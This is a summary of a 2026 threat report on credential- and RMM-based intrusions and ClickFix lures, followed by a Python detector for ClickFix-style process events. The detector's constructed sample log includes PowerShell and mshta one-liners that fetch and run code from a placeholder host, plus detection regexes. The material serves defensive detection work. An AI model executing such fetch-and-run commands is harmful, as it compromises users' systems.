Blackpoint Cyber’s 2026 Annual Threat Report shows attackers increasingly gaining access with valid credentials, trusted administrative tools, and user-driven social engineering rather than by exploiting software vulnerabilities. Key vectors include SSL VPN abuse, widespread misuse of RMM tools such as ScreenConnect, ClickFix-style campaigns, and session-token reuse after MFA. The report urges treating remote access as high-risk and tightening controls so that legitimate-looking intrusions can be detected. #Roadk1ll #ScreenConnect
Key points
- Attackers increasingly enter networks using valid credentials and legitimate remote access instead of exploiting software vulnerabilities.
- SSL VPN abuse was the most common initial access vector, accounting for 32.8% of identifiable incidents.
- RMM tool misuse appeared in 30.3% of incidents, with ScreenConnect present in over 70% of rogue RMM cases.
- Social engineering campaigns such as fake CAPTCHA and ClickFix-style prompts drove 57.5% of incidents by tricking users into running built-in Windows commands themselves.
- Cloud compromises often involved session-token reuse after MFA (about 16%), and implants such as Roadk1ll enabled lateral movement and persistence.
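The ClickFix point above is the one a detection engineer can act on directly: the user pastes a command into a built-in Windows launcher, so the resulting process tree looks like an interactive shell started by the desktop itself rather than by a browser or document. The following is an added example, not code from the report or from Blackpoint Cyber: a heuristic triage over constructed process-creation events that flags scripting hosts spawned by explorer.exe together with command-line traits typical of a pasted one-liner. The log format, the parent/child assumption (that a command entered in the Run dialog inherits explorer.exe as its parent) and the indicator regexes are all assumptions made for this example; tune them against your own telemetry.

```python
"""Heuristic triage of process-creation events for ClickFix-style execution.

Added example (not part of the report). Assumes a flat, constructed log
format: key=value fields separated by '|'. Real Sysmon/EDR data will need
its own parser, but the scoring logic is the same.
"""
import re
from dataclasses import dataclass

# Assumption: a command typed/pasted into the Run dialog (Win+R) is launched
# with explorer.exe as the parent process.
RUN_DIALOG_PARENT = "explorer.exe"

# Built-in Windows binaries a pasted ClickFix command would commonly invoke.
LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "bitsadmin.exe",
}

# Hypothetical indicators of a pasted one-liner (pattern, human-readable label).
INDICATORS = [
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-(ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"\b(iex|invoke-expression)\b", "inline expression evaluation"),
    (r"https?://", "remote URL in command line"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
]


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str
    user: str


def parse_line(line: str) -> ProcEvent:
    """Parse one constructed 'parent=...|image=...|cmdline=...|user=...' line."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcEvent(fields["parent"], fields["image"], fields["cmdline"], fields["user"])


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Score 0 means the event does not fit the pattern at all."""
    reasons: list[str] = []
    if ev.parent.lower() != RUN_DIALOG_PARENT or ev.image.lower() not in LOLBINS:
        return 0, reasons
    reasons.append(f"{ev.image} spawned by {ev.parent}")
    for pattern, label in INDICATORS:
        if re.search(pattern, ev.cmdline, re.IGNORECASE):
            reasons.append(label)
    return len(reasons), reasons


def triage(lines: list[str], threshold: int = 2) -> list[tuple[ProcEvent, list[str]]]:
    """Keep events whose score reaches the threshold; one indicator beyond the parent/child pair."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, reasons))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_LOG = [
    # A user opening PowerShell normally: matches parent/child but nothing else.
    "parent=explorer.exe|image=powershell.exe|cmdline=powershell.exe|user=alice",
    # ClickFix-like paste: hidden window, policy bypass, inline eval, remote fetch.
    'parent=explorer.exe|image=powershell.exe|cmdline=powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/x)"|user=bob',
    # Scheduled task host reaching out: parent is not explorer, so out of scope here.
    "parent=svchost.exe|image=powershell.exe|cmdline=powershell -c iwr https://example.invalid/y|user=SYSTEM",
    # mshta launched from the Run dialog with a URL argument.
    "parent=explorer.exe|image=mshta.exe|cmdline=mshta https://example.invalid/a.hta|user=carol",
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_LOG):
        print(f"[{ev.user}] {ev.image}: " + "; ".join(reasons))
```

The threshold of two deliberately lets an ordinary user opening PowerShell from the Run dialog pass while flagging the pasted one-liner and the mshta launch. On the host side, the same activity leaves a second trace worth correlating: the Run-dialog history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, which records what the user actually typed or pasted.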